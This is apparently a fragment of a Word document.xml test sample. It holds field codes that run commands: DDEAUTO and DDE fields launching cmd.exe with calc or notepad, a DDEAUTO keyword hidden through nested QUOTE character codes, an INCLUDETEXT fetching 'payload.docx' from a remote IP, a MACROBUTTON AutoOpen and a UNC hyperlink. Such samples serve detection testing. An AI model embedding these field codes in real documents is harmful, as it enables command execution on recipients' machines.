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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DD</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">EAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" DDE cmd &quot;/c notepad&quot; x">
        <w:r>
          <w:t xml:space="preserve">simple</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> QUOTE 68 68 69 65 85 84 79 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DDEAUTO</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> c:\\windows\\system32\\cmd.exe "/k calc" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">computed</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDETEXT "http://203.0.113.9/payload.docx" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> MACROBUTTON AutoOpen Double-click here </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "\\\\fileserver\\share\\notes.docx" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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 xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr/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